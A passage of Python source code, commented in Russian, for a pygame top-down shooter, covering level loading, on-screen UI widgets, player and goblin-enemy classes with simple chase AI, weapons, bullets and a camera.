second_weapon.icon_image, (image_second_weapon.get_width(), image_second_weapon.get_height())), (0, 0))
second_weapon_punkt.set_image(image_second_weapon)
second_weapon_punkt.set_text(second_weapon.weapon_name)
second_weapon_punkt.show()
else:
second_weapon_punkt.hide()
# Полоска здоровья
health_punkt = self.get_punkt(10)
image_health = pygame.Surface(size=health_punkt.get_size())
image_health.fill(pygame.color.Color('#800000'))
pygame.draw.rect(image_health, pygame.color.Color('#FF0000'),
(0, 0, image_health.get_width() * (self.player.health / self.player.max_health),
image_health.get_height())) if self.player.health > 0 else None
health_punkt.set_image(image_health)
health_punkt.set_text(f'Здоровье: {round(self.player.health)}')
# Полоска щитов
shields_punkt = self.get_punkt(11)
image_shields = pygame.Surface(size=shields_punkt.get_size())
image_shields.fill(pygame.color.Color('#000080'))
pygame.draw.rect(image_shields, pygame.color.Color('#0000FF'),
(0, 0, image_shields.get_width() * (self.player.shields / self.player.max_shields),
image_shields.get_height())) if self.player.shields > 0 else None
shields_punkt.set_image(image_shields)
shields_punkt.set_text(f'Щиты: {round(self.player.shields)}')
# Полоска энергии
energy_punkt = self.get_punkt(12)
image_energy = pygame.Surface(size=energy_punkt.get_size())
image_energy.fill(pygame.color.Color('#008080'))
pygame.draw.rect(image_energy, pygame.color.Color('#00FFFF'),
(0, 0, image_energy.get_width() * (self.player.energy / self.player.max_energy),
image_energy.get_height())) if self.player.energy > 0 else None
energy_punkt.set_image(image_energy)
energy_punkt.set_text(f'Энергия: {round(self.player.energy)}')
# Показатель брони
armor_punkt = self.get_punkt(13)
armor_punkt.set_text(f'Броня: {round(self.player.armor())}')
# Показатель скорости
sprint_punkt = self.get_punkt(14)
sprint_punkt.set_text(f'Скорость: {round(self.player.sprint_speed(), 1)}')
# Показатель номера уровня
label_level = self.get_punkt(15)
label_level.set_text(f'Уровень {label_level.number_level}')
def render(self, screen):
'''Рисует игровое пространство'''
self.tiles_group.draw(screen)
self.walls_group.draw(screen)
self.transitional_portal_group.draw(screen)
self.items_group.draw(screen)
self.player_group.draw(screen)
self.enemies_group.draw(screen)
self.bullets_group.draw(screen)
for punkt in self.punkts:
punkt.draw(screen, ispressed=punkt.get_focused(pygame.mouse.get_pos()))
def add_punkt(self, punkt):
'''Добавляет 1 пункт'''
self.punkts.append(punkt)
def add_punkts(self, *punkts):
'''Добавляет несколько пунктов'''
self.punkts += list(punkts)
def get_punkt(self, number):
'''Возвращает пункт по заданному номеру'''
for punkt in self.punkts:
if punkt.number == number:
return punkt
def check_on_press_punkts(self, pos):
'''Проверяет пункты на нажатиe'''
for punkt in self.punkts:
if punkt.on_click(pos):
return True
return False
def new_game(self):
'''Сбрасывает предыдущий прогресс и данные'''
print(f'{self.__class__}.new_game()') if DEBUG_INFO else None
self.levels.clear()
self.load_levels(self.game.data_settings["package"])
self.player = Player(self, 0, 0)
# Подключение функций персонажа и его показателей к пунктам:
cur_weapon_punkt = self.get_punkt(8) # Текущее оружие
cur_weapon_punkt.connect(self.player.change_weapons)
second_weapon_punkt = self.get_punkt(9) # Второе оружие
second_weapon_punkt.connect(self.player.change_weapons)
self.get_punkt(15).number_level = 0 # Номер уровня
self.get_punkt(16).hide()
self.update_interface() # Обновление интерфейса
self.generate_level(self.get_next_level())
def finish_game(self, message=None, color=None):
'''Заканчивает игру'''
print(f'{self.__class__}.finish_game()') if DEBUG_INFO else None
self.pause_status = True
label_message = self.get_punkt(16)
label_message.show()
if message:
label_message.set_text(message)
if color:
label_message.set_color(color_text=color)
def get_next_level(self):
'''Получение следующего уровня'''
try:
self.get_punkt(15).number_level += 1
return self.levels.pop(0)
except IndexError:
return None
def generate_level(self, level):
"""Генерация объектов"""
print('\tStart generate level') if DEBUG_INFO else None
if level is None:
# Если уровня нет то игра заканчивается победой
return self.finish_game(message='Ты выйграл', color=pygame.color.Color('green'))
# Установка фона меню на время загрузки
self.game.main_screen.fill((0, 0, 0))
self.game.main_screen.blit(self.game.menu.image_background, (0, 0))
pygame.display.flip()
self.empty_sprites() # Очистка спрайтов
for y in range(len(level)):
for x in range(len(level[y])):
obj = level[y][x]
if obj != '_' and obj != '#':
Tile(self, x, y)
if obj == '#':
Wall(self, x, y)
if obj == 'e':
Enemy(self, x, y)
if obj == 'E':
TransitionalPortal(self, x, y)
if obj == 'T':
choice(StdItems.all_items)(self, x, y)
if obj == 'W':
choice(StdItems.all_weapons)(self, x, y)
if obj == 'A':
choice(StdItems.all_armors)(self, x, y)
if obj == '@':
self.player.set_pos(x, y)
self.player.add(self.player_group, self.all_sprites)
# Добавление в группы предметы игрока
for elem in self.player.things.values():
if elem is not None:
elem.add(self.all_sprites, self.items_group)
print('\tFinish generate level') if DEBUG_INFO else None
def load_levels(self, directory):
'''Загрузка пакета уровней'''
print('GameSpace.load_levels()') if DEBUG_INFO else None
print(f'\tStart load levels {directory}') if DEBUG_INFO else None
self.levels.clear()
for i in range(1, 10 ** 10):
print(f'\t\t--- connect level lvl_{i} ', end='') if DEBUG_INFO else None
filename = f"data/levels/{directory}/lvl_{i}.txt"
# читаем уровень, убирая символы перевода строки
if not os.access(filename, os.F_OK):
break
with open(filename, 'r') as mapFile:
level_map = [line.strip().split() for line in mapFile]
# и подсчитываем максимальную длину
max_width = max(map(len, level_map))
# дополняем каждую строку пустыми клетками ('.')
self.levels.append(list(map(lambda x: x + ['_'] * (max_width - len(x)), level_map)))
print('True') if DEBUG_INFO else None
print('False') if DEBUG_INFO else None
print(f'\tFinish load levels {directory}') if DEBUG_INFO else None
[print([print(row) for row in level]) for level in self.levels] if DEBUG_INFO else None
def empty_sprites(self):
"""Очистка спрайтов"""
print('GameSpace.empty_sprites()') if DEBUG_INFO else None
self.all_sprites.empty()
self.walls_group.empty()
self.items_group.empty()
self.enemies_group.empty()
self.tiles_group.empty()
self.player_group.empty()
self.transitional_portal_group.empty()
self.bullets_group.empty()
class Punkt:
'''
Виджеты (похожи на PushButton и Label из библиотеки PyQt5)
'''
def __init__(self, size, text=None, pos=(0, 0), font=None, color=(100, 100, 100), show_background=True,
color_active=(0, 255, 255), color_text=(0, 0, 0), func=None, number=0, bolden=True):
'''Инициализация'''
print(f'\t\tinit punct text: "{text}"", number: "{number}" : ', end='') if DEBUG_INFO else None
self.text = self.font = self.func = self.color = self.color_text = self.color_active = self.bolden = None
self.number = self.pos = self.x = self.y = self.width = self.height = self.size = self.image = None
self.isshowed = None
self.set_text(text) # Установка текста
self.set_font(font) # Установка шрифта
self.connect(func) # Подключение функции
self.set_color(color, color_active, color_text) # Установка цветов элементов
self.show_background = show_background # Заливка
self.bolden = bolden # Флаг выделения при наведении курсора
self.number = number # Установка номера
self.set_pos(*pos) # Установка позиции
# Установка размера виджета. Если указан size == -1, то размер установится
# минимальным возможным для отображения надписи
self.resize(self.get_size_text() if size == -1 else size)
self.set_image(None) # Установка картинки
self.show() # Отображение
print('True\n', end='') if DEBUG_INFO else None
def get_size(self):
'''Возвращает размеры'''
return self.size
def get_size_text(self):
'''Возвращает размеры текста'''
self.font.set_bold(True) if self.bolden else None
size = self.font.size(self.text)
self.font.set_bold(False) if self.bolden else None
return size
def get_focused(self, pos):
'''Возвращает True если pos находится на кнопке, иначе False'''
if not self.x <= pos[0] <= self.x + self.width:
return False
if not self.y <= pos[1] <= self.y + self.height:
return False
return True
def set_text(self, text):
'''Устанавливает текст'''
self.text = text
def set_font(self, font):
'''Устанавливает шрифт'''
self.font = pygame.font.Font(None, 16) if font is None else font
def set_image(self, image):
'''Устанавливает картинку'''
self.image = image
def set_color(self, color=None, color_active=None, color_text=None):
'''Устанавливает цвета элементов'''
if color is not None:
# Цвет неактивного фона
self.color = color
if color_active is not None:
# Цвет активного фона
self.color_active = color_active
if color_text is not None:
# Цвет текста
self.color_text = color_text
def set_pos(self, x, y):
'''Устанавливает координаты пункта'''
self.pos = self.x, self.y = x, y
def resize(self, size):
'''Меняет размеры'''
self.size = self.width, self.height = size
def show(self):
'''Показать виджет'''
self.isshowed = True
def hide(self):
'''Скрыть виджет'''
self.isshowed = False
def connect(self, func):
'''Подключить функцию'''
self.func = func
def draw(self, screen, ispressed=False):
'''Рисует кнопку на screen'''
if not self.isshowed:
# Не рисует если пункт скрыт
return
surface = pygame.Surface(size=self.get_size())
if self.show_background: # Заливка области
color_background = self.color if not ispressed or not self.bolden else self.color_active
surface.fill(color_background)
else: # Преобразование в прозрачный фон
surface.fill((1, 0, 0))
surface.set_colorkey((1, 0, 0))
if self.image is not None: # наложение картинки если есть она
surface.blit(self.image, (0, 0))
if self.text is not None: # Наложение текста если он есть
if not ispressed or not self.bolden:
# Создание surface текста
text = self.font.render(self.text, 1, self.color_text)
else:
# Создание surface выделенного текста
self.font.set_bold(True)
text = self.font.render(self.text, 1, self.color_text)
self.font.set_bold(False)
# Вычесление центра текста
text_x = self.width // 2 - text.get_width() // 2
text_y = self.height // 2 - text.get_height() // 2
# Наложение текста
surface.blit(text, (text_x, text_y))
# Наложение получившегося изображения punct на screen
screen.blit(surface, self.pos)
def on_click(self, pos):
'''Вызывает функцию подключённую к кнопке, если она была нажата'''
if self.func is None:
return False
if not self.get_focused(pos):
return False
if not self.isshowed:
return False
self.func()
return True
class AnimatedPunkt:
"""
Анимированный пункт
"""
class AnimateBase(pygame.sprite.Sprite):
"""
Базовый класс анимации
"""
def __init__(self, x, y, size, *groups):
"""Инициализация"""
super().__init__(*groups)
self.image = pygame.Surface(size=size)
self.rect = self.image.get_rect().move(x, y)
class Blinking(AnimateBase):
"""
Мигание
"""
def __init__(self, x, y, size, *groups, var=1):
"""Инициализация"""
super().__init__(x, y, size, *groups)
self.min_alpha = 1
self.max_alpha = 20
self.cur_alpha = (self.max_alpha - self.min_alpha) / 2 + self.min_alpha
self.v = 20
self.var = var
self.k = 1
def update(self, *args, **kwargs):
"""Обновление"""
if self.var == 1: # 1 вариант мигания
self.cur_alpha += args[0] * self.v / 1000 * self.k
if not self.min_alpha <= self.cur_alpha <= self.max_alpha:
self.k = -self.k
if self.k == 1:
self.cur_alpha = self.min_alpha
else:
self.cur_alpha = self.max_alpha
if self.var == 2: # 2 вариант мигания
self.k = (-1) ** randint(2, 3)
self.cur_alpha += args[0] * self.v / 1000 * self.k
if not self.min_alpha <= self.cur_alpha <= self.max_alpha:
self.k = -self.k
if self.k == 1:
self.cur_alpha = self.min_alpha
else:
self.cur_alpha = self.max_alpha
if self.cur_alpha:
self.image.set_alpha(int(self.cur_alpha))
class Frames(AnimateBase):
"""
По кадрам
"""
def __init__(self, x, y, size, sheet, column, rows, *groups):
"""Инициализация"""
super().__init__(x, y, size, *groups)
self.cur_frame_index = 0
self.frames_run = self.cut_sheet(sheet, column, rows)
def cut_sheet(self, sheet, columns, rows):
'''Разделение доски анимации и возвращение списка кадров'''
listen = []
self.rect = pygame.Rect(self.rect.x, self.rect.y, sheet.get_width() // columns,
sheet.get_height() // rows)
for j in range(rows):
for i in range(columns):
frame_location = (self.rect.w * i, self.rect.h * j)
listen.append(sheet.subsurface(pygame.Rect(
frame_location, self.rect.size)))
return listen
def update(self, *args, **kwargs):
"""Обновление"""
self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
len(self.frames_run) / 10) % len(self.frames_run)
self.image = self.frames_run[int(self.cur_frame_run)]
class AnimatedSpriteForHero(object):
def init_animation(self, sheet, columns, rows):
# Картинка персонажа в положении покоя
self.std_image = self.image
# Список изображений для анимации бега
self.frames_run = self.cut_sheet(sheet, columns, rows)
# Текущий кадр
self.cur_frame_run = 0
# Взгляд
self.sight = [0, 0]
def cut_sheet(self, sheet, columns, rows):
'''Разделение доски анимации и возвращение списка кадров'''
listen = []
self.rect = pygame.Rect(self.rect.x, self.rect.y, sheet.get_width() // columns,
sheet.get_height() // rows)
for j in range(rows):
for i in range(columns):
frame_location = (self.rect.w * i, self.rect.h * j)
listen.append(sheet.subsurface(pygame.Rect(
frame_location, self.rect.size)))
return listen
def update_animation(self, *args):
'''Обновление анимации'''
if args[1] == 1 or (args[1] == 0 and args[2] == 1):
self.sight = [args[1], args[2]]
self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
len(self.frames_run) / 10) % len(self.frames_run)
self.image = self.frames_run[int(self.cur_frame_run)]
elif args[1] == -1 or (args[1] == 0 and args[2] == -1):
self.sight = [args[1], args[2]]
self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
len(self.frames_run) / 10) % len(self.frames_run)
self.image = pygame.transform.flip(self.frames_run[int(self.cur_frame_run)], True, False)
else:
self.cur_frame_run = 0
self.image = self.std_image if self.sight[0] != -1 else pygame.transform.flip(self.std_image, True, False)
class GameObject(pygame.sprite.Sprite):
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space.all_sprites)
self.gamespace = space
self.image = pygame.Surface(size=(space.size_cell, space.size_cell))
self.image.fill(pygame.color.Color('purple'))
self.true_x, self.true_y = space.size_cell * x, space.size_cell * y
self.rect = self.image.get_rect().move(self.true_x, self.true_y)
print(f'create {self.__class__.__name__}(x={x}; y={y})') if DEBUG_INFO else None
def set_image(self, image):
'''Установка картинки'''
self.image = pygame.transform.scale(image, (self.rect.width, self.rect.height))
def set_pos(self, x, y):
'''Установка позиции'''
print(f'{self.__class__}.set_pos(x={x}, y={y})') if DEBUG_INFO else None
self.rect.x, self.rect.y = self.true_x, self.true_y = (self.gamespace.size_cell * x,
self.gamespace.size_cell * y)
def set_coordinates(self, x, y):
"""Установка координат"""
self.rect.x, self.rect.y = self.true_x, self.true_y = x, y
class BaseHero(GameObject):
'''
Базовый класс для персонажей
'''
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space, x, y)
# Радиус подбора предметов
self.take_radius = space.size_cell * 1.046
# Маска
self.mask = pygame.mask.from_surface(self.image)
# Предметы персонажа
self.things = {'cur_weapon': None, 'second_weapon': None,
'helmet': None, 'vest': None, 'boots': None,
'amulet': None}
self.readiness_recovery_shields = 1 # Готовность к востановлению щитов
self.readiness_recovery_energy = 1 # Готовность к востановлению энэргии
self.v_recovery_shiels = 10 # Скорость востановления щитов в секунду
self.v_recovery_enegry = 15 # Скорость востановления энэргии в секунду
self._armor = 0 # Броня
self._sprint_speed = 4 # Скорость спринта
self.health = self.max_health = 100 # Здоровье
self.shields = self.max_shields = 100 # Щиты
self.energy = self.max_energy = 100 # Энергия
print(f'create {self.__class__.__name__}(x={x}, y={y})') if DEBUG_INFO else None
def draw_health_shields_line(self):
"""Рисует на self.image полоску здоровья и щитов"""
line_health_and_shields = pygame.Surface(size=(self.image.get_width() * 2 / 3, 3))
sum_max_health_and_shields = self.max_health + self.max_shields
size_line_max_health = (self.max_health / sum_max_health_and_shields * line_health_and_shields.get_width(),
line_health_and_shields.get_height())
size_line_health = (self.health / sum_max_health_and_shields * line_health_and_shields.get_width(),
line_health_and_shields.get_height())
size_line_max_shields = (self.max_shields / sum_max_health_and_shields * line_health_and_shields.get_width(),
line_health_and_shields.get_height())
size_line_shields = (self.shields / sum_max_health_and_shields * line_health_and_shields.get_width(),
line_health_and_shields.get_height())
pygame.draw.rect(line_health_and_shields, pygame.color.Color('#800000'), (0, 0, *size_line_max_health))
pygame.draw.rect(line_health_and_shields, pygame.color.Color('#FF0000'), (0, 0, *size_line_health))
pygame.draw.rect(line_health_and_shields, pygame.color.Color('#000080'),
(size_line_max_health[0], 0, *size_line_max_shields)) if self.health > 0 else None
pygame.draw.rect(line_health_and_shields, pygame.color.Color('#0000FF'),
(size_line_max_health[0], 0, *size_line_shields)) if self.shields > 0 else None
self.image.blit(line_health_and_shields, (self.image.get_width() / 6, 10))
def attack(self, target):
'''Атака из текущего оружия'''
print(f'{self.__class__.__name__}().attack(target={target})') if DEBUG_INFO else None
weapon = self.things.get('cur_weapon')
if weapon is None:
return
else:
if isinstance(target, BaseHero):
weapon.attack(self, target.rect.x + target.rect.width / 2, target.rect.y + target.rect.height / 2)
elif isinstance(target, tuple):
weapon.attack(self, *target)
def half_damage(self, damage):
'''Получение урона'''
print(f'{self.__class__}.half_damge(damage={damage}, ', end='') if DEBUG_INFO else None
damage -= damage * (self.armor() / (self.armor() + 300)) # Истинный полученный урон
print(f'true_damage={damage})') if DEBUG_INFO else None
if self.shields - damage < 0:
damage -= self.shields
self.shields = 0
self.health -= damage
else:
self.shields -= damage
self.readiness_recovery_shields = 0
def change_weapons(self):
'''Смена оружия'''
print(f'{self.__class__}.change_weapons()') if DEBUG_INFO else None
self.things['cur_weapon'], self.things['second_weapon'] = (self.things['second_weapon'],
self.things['cur_weapon'])
def take_thing(self, pos):
'''Подбор вещи'''
print(f'{self.__class__}.take_thing(pos={pos})') if DEBUG_INFO else None
thing = None
for elem in self.gamespace.items_group.sprites():
if elem.rect.collidepoint(pos):
if not elem.is_taken:
thing = elem
break
if thing is None:
return False
if not ((self.rect.x - thing.rect.x) ** 2 + (self.rect.y - thing.rect.y) ** 2) ** 0.5 < self.take_radius:
return False
if thing.type_item == 'weapon':
if self.things['cur_weapon'] is None:
self.things['cur_weapon'] = thing
elif self.things['second_weapon'] is None:
self.things['second_weapon'] = thing
else:
old_thing = self.things["cur_weapon"]
self.things['cur_weapon'] = thing
old_thing.put(self.rect.x, self.rect.y)
else:
old_thing = self.things.get(thing.type_item)
if old_thing is not None:
old_thing.put(self.rect.x, self.rect.y)
self.things[thing.type_item] = thing
thing.set_taken()
return True
def armor(self): # Кол-во брони броня
return sum(map(lambda key: self.things[key].armor if self.things.get(key) else 0,
self.things.keys())) + self._armor
def sprint_speed(self): # Скорость спринта
return sum(map(lambda key: self.things[key].sprint_speed if self.things.get(key) else 0,
self.things.keys())) + self._sprint_speed
def get_moving(self, tick): # Перемещение
return tick * self.gamespace.size_cell * self.sprint_speed() / 1000
def move_up(self, tick):
"""Движение вверх"""
self.true_y -= self.get_moving(tick) # Установка новых истенных координат
self.rect.y = int(self.true_y) # Установка новых координат квадрата
# Получения списка стен с которыми персонаж пересёкся
sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
if sprite_list:
# Если было пересечение то перемещение песонажа на максимально маленькое растояние
self.rect.y = self.true_y = sprite_list[0].rect.y + sprite_list[0].rect.size[1]
def move_down(self, tick):
"""Движение вниз"""
self.true_y += self.get_moving(tick) # Установка новых истенных координат
self.rect.y = int(self.true_y) # Установка новых координат квадрата
# Получения списка стен с которыми персонаж пересёкся
sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
if sprite_list:
# Если было пересечение то перемещение песонажа на максимально маленькое растояние
self.rect.y = self.true_y = sprite_list[0].rect.y - self.rect.size[1]
def move_left(self, tick):
"""Движение вправо"""
self.true_x -= self.get_moving(tick) # Установка новых истенных координат
self.rect.x = int(self.true_x) # Установка новых координат квадрата
# Получения списка стен с которыми персонаж пересёкся
sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
if sprite_list:
# Если было пересечение то перемещение песонажа на максимально маленькое растояние
self.rect.x = self.true_x = sprite_list[0].rect.x + sprite_list[0].rect.size[0]
def move_right(self, tick):
"""Движение влево"""
self.true_x += self.get_moving(tick) # Установка новых истенных координат
self.rect.x = int(self.true_x) # Установка новых координат квадрата
# Получения списка стен с которыми персонаж пересёкся
sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
if sprite_list:
# Если было пересечение то перемещение песонажа на максимально маленькое растояние
self.rect.x = self.true_x = sprite_list[0].rect.x - self.rect.size[0]
def get_distance(self, other):
'''Возвращает растояние между self и другого такого же объекта'''
return ((self.true_x - other.true_x) ** 2 + (self.true_y - other.true_y) ** 2) ** 0.5
class Player(BaseHero, AnimatedSpriteForHero):
'''
Класс игрока
'''
def __init__(self, space, x, y):
"""Инициализвация"""
super().__init__(space, x, y)
image = pygame.transform.scale(space.game.load_image('player\std.png', -1),
(space.size_cell, space.size_cell))
self.set_image(image)
sheet_animation_run = self.gamespace.game.load_image('player\\animation run 10x1.png', -1)
sheet_animation_run = pygame.transform.scale(sheet_animation_run, (space.size_cell * 10, space.size_cell * 1))
self.init_animation(sheet_animation_run, 10, 1)
def update(self, *args):
"""Обновление"""
pressed_keys = pygame.key.get_pressed() # Получения списка нажатых клавишь
move_kx = move_ky = 0 # Коэффициэты показывающие куда персонаж сходил
if self.health <= 0:
# Если здоровье падает до 0 и меньше то игра заканчивается
self.kill()
self.gamespace.finish_game(message='Ты проиграл', color=pygame.color.Color('red'))
return
if pressed_keys[pygame.K_RIGHT] or pressed_keys[pygame.K_d]:
# Движение вправо если нажата клавиша Right или D
self.move_right(args[0])
move_kx += 1
if pressed_keys[pygame.K_LEFT] or pressed_keys[pygame.K_a]:
# Движение влево если нажата клавиша Left или A
self.move_left(args[0])
move_kx -= 1
if pressed_keys[pygame.K_UP] or pressed_keys[pygame.K_w]:
# Движение вверх если нажата клавиша Up или W
self.move_up(args[0])
move_ky += 1
if pressed_keys[pygame.K_DOWN] or pressed_keys[pygame.K_s]:
# Движение вниз если нажата клавиша Down или S
self.move_down(args[0])
move_ky -= 1
# Обновление анимации
self.update_animation(args[0], move_kx, move_ky, self.sprint_speed())
# Обновление щитов
if self.readiness_recovery_shields < 1:
self.readiness_recovery_shields += args[0] / 1000 * (1 / 3)
else:
self.shields += self.v_recovery_shiels * args[0] / 1000
if self.shields > self.max_shields:
self.shields = self.max_shields
# Обновление энергии
if self.readiness_recovery_energy < 1:
self.readiness_recovery_energy += args[0] / 1000 * 2
else:
self.energy += self.v_recovery_enegry * args[0] / 1000
if self.energy > self.max_energy:
self.energy = self.max_energy
class Enemy(BaseHero, AnimatedSpriteForHero):
'''
Класс врагов
'''
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space, x, y)
image = pygame.transform.scale(space.game.load_image('enemy\goblin std2.png', -1),
(space.size_cell, space.size_cell))
self.set_image(image)
sheet = pygame.transform.scale(self.gamespace.game.load_image('enemy\\animation run 6x1.png', -1),
(space.size_cell * 6, space.size_cell * 1))
self.init_animation(sheet, 6, 1)
self.add(space.enemies_group)
self.activity = False # Флаг активности интелекта
self.r_detection = space.size_cell * 3 # Растояние обнаружения
# Радиус атаки (min, max)
self.attack_range = (space.size_cell * 1.5, space.size_cell * 2.5)
# Оружие
weapon = choice(StdItems.all_weapons)(space, x, y)
self.things["cur_weapon"] = weapon
weapon.set_taken()
# Броня
armor = choice(StdItems.all_armors)(space, x, y)
self.things[armor.type_item] = armor
armor.set_taken()
def ai(self, tick, target):
"""Искуственный интелект врагов"""
move_kx = move_ky = 0
if self.attack_range[0] < self.get_distance(target) < self.attack_range[1]:
self.attack(target)
elif not self.attack_range[1] > self.get_distance(target):
if self.true_x < target.true_x:
self.move_right(tick)
move_kx += 1
if self.true_x > target.true_x:
self.move_left(tick)
move_kx -= 1
if self.true_y < target.true_y:
self.move_down(tick)
move_ky -= 1
if self.true_y > target.true_y:
self.move_up(tick)
move_ky += 1
elif not self.attack_range[0] < self.get_distance(target):
if self.true_x < target.true_x:
self.move_left(tick)
move_kx -= 1
if self.true_x > target.true_x:
self.move_right(tick)
move_kx += 1
if self.true_y > target.true_y:
self.move_down(tick)
move_ky -= 1
if self.true_y < target.true_y:
self.move_up(tick)
move_ky += 1
self.update_animation(tick, move_kx, move_ky, self.sprint_speed())
def update(self, *args):
"""Обновление"""
if self.health <= 0:
# Уничтожение врага при здоровье 0 и ниже
return self.kill()
if self.activity:
# Использование ИИ если активен
self.ai(args[0], self.gamespace.player)
# Проверка на активацию искуственного ителекта при:
elif self.get_distance(self.gamespace.player) <= self.r_detection:
# обнаружении игрока
self.activity = True
else:
for enemy in self.gamespace.enemies_group.sprites():
# При обнаружении врага который активен
if self.get_distance(enemy) <= self.r_detection and enemy.activity:
self.activity = True
if self.activity:
break
for bullet in self.gamespace.bullets_group.sprites():
# При обнаружении снаряда
if self.get_distance(bullet) <= self.r_detection:
self.activity = True
if self.activity:
break
# Обновление щитов
if self.readiness_recovery_shields < 1:
self.readiness_recovery_shields += args[0] / 1000 * (1 / 3)
else:
self.shields += self.v_recovery_shiels * args[0] / 1000
if self.shields > self.max_shields:
self.shields = self.max_shields
# Обновление брони
if self.readiness_recovery_energy < 1:
self.readiness_recovery_energy += args[0] / 1000 * 2
else:
self.energy += self.v_recovery_enegry * args[0] / 1000
if self.energy > self.max_energy:
self.energy = self.max_energy
self.draw_health_shields_line()
class Wall(GameObject):
'''
Класс стен
'''
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space, x, y)
self.set_image(space.game.load_image('wall\wall.jpg'))
self.add(space.walls_group)
class Tile(GameObject):
'''
Класс плиток
'''
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space, x, y)
self.set_image(space.game.load_image('tile\\tile_1.png'))
self.add(space.tiles_group)
class TransitionalPortal(GameObject):
'''
Класс портала для перехода на новый уровень
'''
def __init__(self, space, x, y):
"""Инициализация"""
super().__init__(space, x, y)
self.set_image(space.game.load_image('transitional portal\\std.png', -1))
self.add(space.transitional_portal_group)
class Item(GameObject):
def __init__(self, gamespace, x, y):
"""Инициализация"""
super().__init__(gamespace, x, y)
default_image = pygame.Surface(size=[gamespace.size_cell // 1.5] * 2)
default_image.fill(pygame.color.Color('purple')) # Стандартная картинка
self.image = default_image
self.rect = self.image.get_rect().move(self.true_x, self.true_y)
self.add(gamespace.items_group)
self.type_item = "none" # Тип предмета
self.armor = 0 # Бафф брони
self.sprint_speed = 0 # Бафф скорости
self.is_taken = False # Статус взятия
self.icon_image = self.image.copy() # Иконка
def set_image(self, image):
"""Установка картинки"""
super().set_image(image)
self.icon_image = self.image
def set_taken(self):
"""Установка статуса взятия"""
self.is_taken = True
image = pygame.Surface(size=(10, 10))
image.set_colorkey(image.get_at((0, 0)))
self.image = image
def put(self, x, y):
"""Бросание предмета"""
self.is_taken = False
self.image = self.icon_image
self.set_coordinates(x, y)
class Weapon(Item):
def __init__(self, gamespace, x, y, name, damage=1, speed_attack=1.0, bullet=None, energy_requirement=1):
"""Инициализация"""
super().__init__(gamespace, x, y)
self.type_item = "weapon" # Тип предмета
self.weapon_name = name # Имя оружия
self.damage = damage # Урон
self.bullet = bullet # Снаряды
self.attack_readiness = 1 # Готовность к атаке
self.speed_attack = speed_attack # Скорость атаки
self.energy_efficiency = energy_requirement # Потребление энергии
def attack(self, sender, x_cur, y_cur):
"""Атака"""
if sender.energy < self.energy_efficiency:
return # Нельзя стрелять при не достатке энергии
if self.attack_readiness < 1:
return # Нельзя стрелять когда атака не готова
if self.bullet is None:
# Если нет снаряда то создать снаряд по умолчанию
Bullet(self.gamespace, sender, (x_cur, y_cur), self.damage)
else:
self.bullet(self.gamespace, sender, (x_cur, y_cur), self.damage)
# Обнуление готовности атаки и востановлению энергии
self.attack_readiness = 0
sender.readiness_recovery_energy = 0
# Уменьшение энергии
sender.energy -= self.energy_efficiency
def update(self, *args):
"""Обновление"""
self.attack_readiness += self.speed_attack * args[0] / 1000
if self.attack_readiness > 1:
self.attack_readiness = 1
class Bullet(GameObject):
def __init__(self, gamespace, sender, pos_finish, damage, k_speed=1):
"""Инициализация"""
super().__init__(gamespace, 0, 0)
default_image = pygame.Surface(size=[gamespace.size_cell // 4] * 2)
default_image.fill(pygame.color.Color("red"))
self.image = default_image
self.rect = self.image.get_rect().move(
sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.set_coordinates(sender.true_x + gamespace.size_cell // 2 - default_image.get_width() // 2,
sender.true_y + gamespace.size_cell // 2 - default_image.get_height() // 2)
self.add(gamespace.bullets_group)
self.damage = damage # Урон
self.sender = sender # Отправитель
self.k_speed = k_speed # Множитель скорости полёта
# Высчитывание направления снаряда
try:
angle = atan(((pos_finish[1] - self.image.get_height() / 2) - self.true_y) /
((pos_finish[0] - self.image.get_width() / 2) - self.true_x))
self.vx = cos(angle)
self.vy = sin(angle)
if pos_finish[0] - self.image.get_width() / 2 < self.true_x:
self.vx *= -1
self.vy *= -1
except ZeroDivisionError:
self.vx = 0
self.vy = copysign(1, (pos_finish[1] - self.image.get_height() / 2) - self.true_y)
def update(self, *args):
"""Обновление"""
self.true_x += args[0] / 1000 * self.gamespace.size_cell * self.vx * self.k_speed
self.true_y += args[0] / 1000 * self.gamespace.size_cell * self.vy * self.k_speed
self.rect.x, self.rect.y = int(self.true_x), int(self.true_y)
# Получение целей которым можно нанести урон
heroes = ((pygame.sprite.spritecollide(self, self.gamespace.enemies_group, False)
if self.sender not in self.gamespace.enemies_group else []) +
(pygame.sprite.spritecollide(self, self.gamespace.player_group, False)
if self.sender not in self.gamespace.player_group else []))
heroes.remove(self.sender) if self.sender in heroes else None
if heroes:
for sprite in heroes:
# Нанесение урона целям
sprite.half_damage(self.damage)
self.kill() # Уничтожение снаряда
elif pygame.sprite.spritecollideany(self, self.gamespace.walls_group, False):
self.kill() # При попадании в стену снаряд уничтожается
class Camera:
# зададим начальный сдвиг камеры
def __init__(self, gamespace):
"""Инициализация"""
self.gamespace = gamespace
self.dx = 0
self.dy = 0
# сдвинуть объект obj на смещение камеры
def apply(self, obj):
obj.rect.x += self.dx
obj.rect.y += self.dy
obj.true_x += self.dx
obj.true_y += self.dy
# позиционировать камеру на объекте target
def update(self, target):
self.dx = -(target.rect.x + target.rect.w // 2 - self.gamespace.game.width // 2)
self.dy = -(target.rect.y + target.rect.h // 2 - self.gamespace.game.height // 2)
class StdItems:
"""Стандартные предметы"""
class WeaponStaff(Weapon):
# Посох
def __init__(self, gamespace, x, y):
super().__init__(gamespace, x, y, "Посох", damage=150, speed_attack=0.5, bullet=StdBullets.BlueBall,
energy_requirement=25)
self.set_image(gamespace.game.load_image("weapon\\staff.png", -1))
class WeaponShuriken(Weapon):
# Сюрикен
